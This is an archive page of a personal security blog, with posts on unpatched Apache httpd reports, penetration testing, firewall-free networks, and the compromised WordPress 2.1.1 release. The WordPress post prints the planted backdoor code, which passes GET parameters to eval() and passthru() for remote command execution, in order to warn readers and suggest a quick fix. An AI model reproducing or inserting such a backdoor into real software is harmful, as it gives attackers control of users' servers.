cat >/dev/null_

Archive of security

apache httpd vulnerabilities

May

29th

2007

I am not able to sleep well if I do not take at least a cursory look at BugTraq before bed.

I just literally stumbled upon this: Apache httpd vulenrabilities (sic)

What worries me has not so much to do with the vulnerabilities themselves, rather than with the accompanying note:

The information on the vulnerabilities above was sent to Apache Software Foundation on 16 May, 2006. For over 1 year no official patch has been issued.

People like myself often point at Apache as an example of Free Software’s excellence, especially where security is concerned. So, assuming that the threats are real, is this possible, I am wondering?

I will definitely keep my eyes on this thread. Meanwhile, I am not going to sleep well tonight.

security

advisory, apache, BUGTRAQ, free software, httpd, security

One Comment

free penetration test

May

15th

2007

From Bruce Schneier:

There are two reasons why you might want to conduct a penetration test. One, you want to know whether a certain vulnerability is present because you’re going to fix it if it is. And two, you need a big, scary report to persuade your boss to spend more money. If neither is true, I’m going to save you a lot of money by giving you this free penetration test: You’re vulnerable.

Now, go do something useful about it.

Though I don’t completely subscribe to the point of view expressed by both this essay and Ranum’s rebuttal (I believe their brevity is not doing justice to a complex subject), I liked this particular paragraph. I find it so true… and, why not, funny!

copycat blogging, security

Bruce Schneier, Marcus Ranum, pen test, penetration test, security

One Comment

wordpress 2.1.1 source code distribution compromised

March

4th

2007

What is this shit? A joke? It’s not funny!

// from wp-includes/feed.php
function comment_text_phpfilter($filterdata) {
        eval($filterdata);
}
// [...]
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

// from wp-includes/theme.php
function get_theme_mcommand($mcds) {
        passthru($mcds);
}
// [...]
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

I’m speechless.

Why do we always have to wait for things like these to happen before we take even the most basic security measures!

I’m aware that this is a complicated matter, but we can’t just take chances like that!!!! Or can we?

I love WordPress, but this is just too big. I am also wondering why the message on wordpress.org didn’t mention what seems to me like a quick patch, that is commenting the two if statements above (wp-includes/feed.php, line 149; wp-includes/theme.php, line 441; at least on my 2.1.1 installation).

Let’s see the official advisories. Why aren’t there any yet? A message from BugTraq is all I could find.

Quick, go fix it!!!

security

BUGTRAQ, compromise, exploit, feed.php, security, theme.php, wordpress

One Comment

back to kindergarten

August

24th

2006

Sometimes I wonder if the people who rule the world have been to kindergarten.

How about fighting terrorism with anti–terrorism?

Yes, it really is that simple.

Well, maybe simple is not the word, but it would be such an improvement over movie plot security practices.

Of course Bruce Schneier makes it look simpler still, the man who can break AES just past his afternoon nap; after all it’s not his fault if Rijndael was chosen over Twofish.

Check out other Bruce Schneier facts.

copycat blogging, security

Bruce Schneier, kindergarten, movie plot security, security, terrorism

Be the first to comment...

firewalls are useless (in a good world)

June

6th

2006

I just finished reading a very interesting article titled “Security without firewalls: Sensible or silly?“. The article describes a case of a complex network implementation that does not use a firewall, and poses interesting questions on the subject.

My statement that firewalls are useless may sound weird, being mouthed by someone who goes around selling himself as a computer security expert, and actually sells firewalls. If you think so, do your homework, maybe starting from the article above; you will find out interesting things.

One of my favourite quotes about firewalls comes from a paper which is not about firewalls—and that, you will see, is the point—but about software development. It is titled “Shifting the Odds – Writing (More) Secure Software”, by Steve Bellovin.

It says:

[...] firewalls are a network response to a software engineering problem.

I think that the article is a very good elaboration of this concept. Firewalls are a blatant excuse for buggy programming and protocols, horrible patch policies and zero host security practices. But it does not end here. They are network performance hogs. They are costly and complex to deploy. They are overly trusted, almost invariantly and in countless ways. That is the Great Truth of Network Security.

My home network and public servers are not protected by a firewall, and they needn’t be. Of course I’m not saying that nobody could ever break in (however unlikely that may be ). it’s just that I consider my host-based security practices as good as I find them sensible to be (and then a little more, just because I can ). As in the case described by the article, an additional layer would do no good, while introducing unnecessary complexity and hassles.

But I can’t deny that my world is what I call the good world.

Real life scenarios are often very different. In the business world, at least where I live, many people will see security expenses as a cost, refusing to consider the benefits. They would rather, and often do, pay four times as much when shit happens, than spend in advance for business continuity. However much we chant, they fail to see security as a process rather than a product: they mistake the mantra for a selling strategy.

In conclusion: the firewall is never a substitute for other good security practices. When other good security practices are in place, firewalls are often redundant or even harmful.

But you’re not going to have good security practices, so at least get a decent firewall.

computing

business, firewalls, internet firewalls, security

Be the first to comment...